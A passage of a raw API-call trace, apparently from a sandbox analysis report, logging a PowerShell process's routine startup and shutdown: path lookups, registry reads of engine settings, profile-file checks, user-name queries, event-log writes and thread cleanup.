0x19 [0056.765] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.766] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0056.766] SetErrorMode (uMode=0x1) returned 0x1 [0056.766] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0056.766] SetErrorMode (uMode=0x1) returned 0x1 [0056.766] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0056.766] SetErrorMode (uMode=0x1) returned 0x1 [0056.766] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0056.766] SetErrorMode (uMode=0x1) returned 0x1 [0056.766] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0056.766] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0056.767] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.767] SetErrorMode (uMode=0x1) returned 0x1 [0056.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.767] SetErrorMode (uMode=0x1) returned 0x1 [0056.767] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.767] SetErrorMode (uMode=0x1) returned 0x1 [0056.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.767] SetErrorMode (uMode=0x1) returned 0x1 [0056.767] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xcd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.767] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.767] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.767] SetErrorMode (uMode=0x1) returned 0x1 [0056.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.767] SetErrorMode (uMode=0x1) returned 0x1 [0056.768] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.768] SetErrorMode (uMode=0x1) returned 0x1 [0056.768] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.768] SetErrorMode (uMode=0x1) returned 0x1 [0056.768] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.768] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.770] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.770] SetErrorMode (uMode=0x1) returned 0x1 [0056.770] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd750 | out: lpFileInformation=0xcd750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.770] SetErrorMode (uMode=0x1) returned 0x1 [0056.819] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a10c0, nSize=0xcdab8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcdab8) returned 0x1 [0056.820] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcdaf8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcdaf8) returned 1 [0056.821] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3cca098*="Available", lpRawData=0x3cc9e28) returned 1 [0056.821] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.822] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.824] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcda5c, lpData=0x0, lpcbData=0xcda58*=0x0 | out: lpType=0xcda5c*=0x1, lpData=0x0, lpcbData=0xcda58*=0x56) returned 0x0 [0056.824] CoTaskMemAlloc (cb=0x5a) returned 0x332600 [0056.824] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcda2c, lpData=0x332600, lpcbData=0xcda28*=0x56 | out: lpType=0xcda2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcda28*=0x56) returned 0x0 [0056.825] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.837] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.848] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.848] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.849] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.850] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.850] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.851] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.904] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x32aa00 [0057.051] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.051] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.059] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdc38 | out: phkResult=0xcdc38*=0x3b0) returned 0x0 [0057.059] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdbbc, lpData=0x0, lpcbData=0xcdbb8*=0x0 | out: lpType=0xcdbbc*=0x1, lpData=0x0, lpcbData=0xcdbb8*=0x56) returned 0x0 [0057.059] CoTaskMemAlloc (cb=0x5a) returned 0x1b7b3380 [0057.059] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdb8c, lpData=0x1b7b3380, lpcbData=0xcdb88*=0x56 | out: lpType=0xcdb8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcdb88*=0x56) returned 0x0 [0057.059] CoTaskMemFree (pv=0x1b7b3380) [0057.059] RegCloseKey (hKey=0x3b0) returned 0x0 [0057.059] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdc38 | out: phkResult=0xcdc38*=0x3b0) returned 0x0 [0057.059] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdbbc, lpData=0x0, lpcbData=0xcdbb8*=0x0 | out: lpType=0xcdbbc*=0x1, lpData=0x0, lpcbData=0xcdbb8*=0x56) returned 0x0 [0057.059] CoTaskMemAlloc (cb=0x5a) returned 0x1b7b3380 [0057.059] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdb8c, lpData=0x1b7b3380, lpcbData=0xcdb88*=0x56 | out: lpType=0xcdb8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcdb88*=0x56) returned 0x0 [0057.060] CoTaskMemFree (pv=0x1b7b3380) [0057.060] RegCloseKey (hKey=0x3b0) returned 0x0 [0057.061] CoTaskMemAlloc (cb=0x20c) returned 0x1b7866c0 [0057.061] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7866c0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0057.062] CoTaskMemFree (pv=0x1b7866c0) [0057.062] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xcd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0057.062] CoTaskMemAlloc (cb=0x20c) returned 0x1b7866c0 [0057.062] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7866c0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0057.062] CoTaskMemFree (pv=0x1b7866c0) [0057.062] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xcd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0057.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0057.064] SetErrorMode (uMode=0x1) returned 0x1 [0057.064] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcdba0 | out: lpFileInformation=0xcdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.064] SetErrorMode (uMode=0x1) returned 0x1 [0057.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0057.064] SetErrorMode (uMode=0x1) returned 0x1 [0057.064] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcdba0 | out: lpFileInformation=0xcdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.064] SetErrorMode (uMode=0x1) returned 0x1 [0057.064] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0057.064] SetErrorMode (uMode=0x1) returned 0x1 [0057.064] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcdba0 | out: lpFileInformation=0xcdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.064] SetErrorMode (uMode=0x1) returned 0x1 [0057.065] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0057.065] SetErrorMode (uMode=0x1) returned 0x1 [0057.065] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcdba0 | out: lpFileInformation=0xcdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.065] SetErrorMode (uMode=0x1) returned 0x1 [0057.066] CoTaskMemFree (pv=0x32ac20) [0057.066] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.066] CoTaskMemFree (pv=0x32ac20) [0057.067] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.067] CoTaskMemFree (pv=0x32ac20) [0057.067] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.067] CoTaskMemFree (pv=0x32ac20) [0057.069] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.069] CoTaskMemFree (pv=0x32ac20) [0057.070] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b8 [0057.070] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b4 [0057.070] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3bc [0057.070] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0 [0057.070] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4 [0057.070] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c8 [0057.071] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc [0057.071] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d0 [0057.071] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d4 [0057.071] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3d8 [0057.071] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3dc [0057.071] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0057.072] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.072] CoTaskMemFree (pv=0x32ac20) [0057.073] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0057.074] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcdd80 | out: lpMode=0xcdd80) returned 1 [0057.075] CoTaskMemFree (pv=0x32ac20) [0057.078] SetEvent (hEvent=0x3c0) returned 1 [0057.078] SetEvent (hEvent=0x3b8) returned 1 [0057.078] SetEvent (hEvent=0x3b4) returned 1 [0057.078] SetEvent (hEvent=0x3bc) returned 1 [0057.078] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e4 [0057.079] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.080] CoTaskMemFree (pv=0x32ac20) [0057.080] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdad8 | out: phkResult=0xcdad8*=0x3e8) returned 0x0 [0057.080] RegQueryValueExW (in: hKey=0x3e8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcda5c, lpData=0x0, lpcbData=0xcda58*=0x0 | out: lpType=0xcda5c*=0x0, lpData=0x0, lpcbData=0xcda58*=0x0) returned 0x2 [0103.945] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c [0103.945] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340 [0103.945] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348 [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364 [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f0 [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x58c [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x588 [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x550 [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x54c [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x544 [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x554 [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x55c [0103.946] SetEvent (hEvent=0x364) returned 1 [0103.946] SetEvent (hEvent=0x33c) returned 1 [0103.946] SetEvent (hEvent=0x340) returned 1 [0103.946] SetEvent (hEvent=0x348) returned 1 [0103.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5a8 [0103.946] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdb68 | out: phkResult=0xcdb68*=0x570) returned 0x0 [0103.947] RegQueryValueExW (in: hKey=0x570, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcdaec, lpData=0x0, lpcbData=0xcdae8*=0x0 | out: lpType=0xcdaec*=0x0, lpData=0x0, lpcbData=0xcdae8*=0x0) returned 0x2 [0104.257] SetEvent (hEvent=0x4f0) returned 1 [0104.257] SetEvent (hEvent=0x58c) returned 1 [0104.257] SetEvent (hEvent=0x588) returned 1 [0104.282] CoTaskMemAlloc (cb=0x104) returned 0x32bf40 [0104.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32bf40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.282] CoTaskMemFree (pv=0x32bf40) [0104.302] SetEvent (hEvent=0x320) returned 1 [0104.303] CoTaskMemAlloc (cb=0x804) returned 0x1b7bbe20 [0104.305] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7bbe20, nSize=0xcdc08 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcdc08) returned 0x1 [0104.305] CoTaskMemFree (pv=0x1b7bbe20) [0104.306] CoTaskMemAlloc (cb=0x204) returned 0x2dcfe0 [0104.306] GetUserNameW (in: lpBuffer=0x2dcfe0, pcbBuffer=0xcdc48 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcdc48) returned 1 [0104.306] CoTaskMemFree (pv=0x2dcfe0) [0104.309] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x344df28*="Stopped", lpRawData=0x344dcb8) returned 1 [0104.394] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0104.399] CoGetContextToken (in: pToken=0xcf7d0 | out: pToken=0xcf7d0) returned 0x0 [0104.399] CObjectContext::QueryInterface () returned 0x0 [0104.399] CObjectContext::GetCurrentThreadType () returned 0x0 [0104.399] Release () returned 0x0 [0104.401] CoGetContextToken (in: pToken=0xcf3a0 | out: pToken=0xcf3a0) returned 0x0 [0104.401] CObjectContext::QueryInterface () returned 0x0 [0104.401] CObjectContext::GetCurrentThreadType () returned 0x0 [0104.401] Release () returned 0x0 [0104.402] CoGetContextToken (in: pToken=0xcf3a0 | out: pToken=0xcf3a0) returned 0x0 [0104.403] CObjectContext::QueryInterface () returned 0x0 [0104.410] CObjectContext::GetCurrentThreadType () returned 0x0 [0104.410] Release () returned 0x0 [0104.418] CoGetContextToken (in: pToken=0xcf3a0 | out: pToken=0xcf3a0) returned 0x0 [0104.419] CObjectContext::QueryInterface () returned 0x0 [0104.420] CObjectContext::GetCurrentThreadType () returned 0x0 [0104.420] Release () returned 0x0 [0104.464] CoGetContextToken (in: pToken=0xcf390 | out: pToken=0xcf390) returned 0x0 [0104.464] CObjectContext::QueryInterface () returned 0x0 [0104.464] CObjectContext::GetCurrentThreadType () returned 0x0 [0104.464] Release () returned 0x0 [0104.468] CoUninitialize () Thread: id = 37 os_tid = 0xa8c Thread: id = 38 os_tid = 0xa90 Thread: id = 39 os_tid = 0xa98 Thread: id = 40 os_tid = 0xaa0 Thread: id = 41 os_tid = 0xaa4 [0053.975] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0056.311] LocalFree (hMem=0x284100) returned 0x0 [0056.312] CloseHandle (hObject=0x324) returned 1 [0056.312] CloseHandle 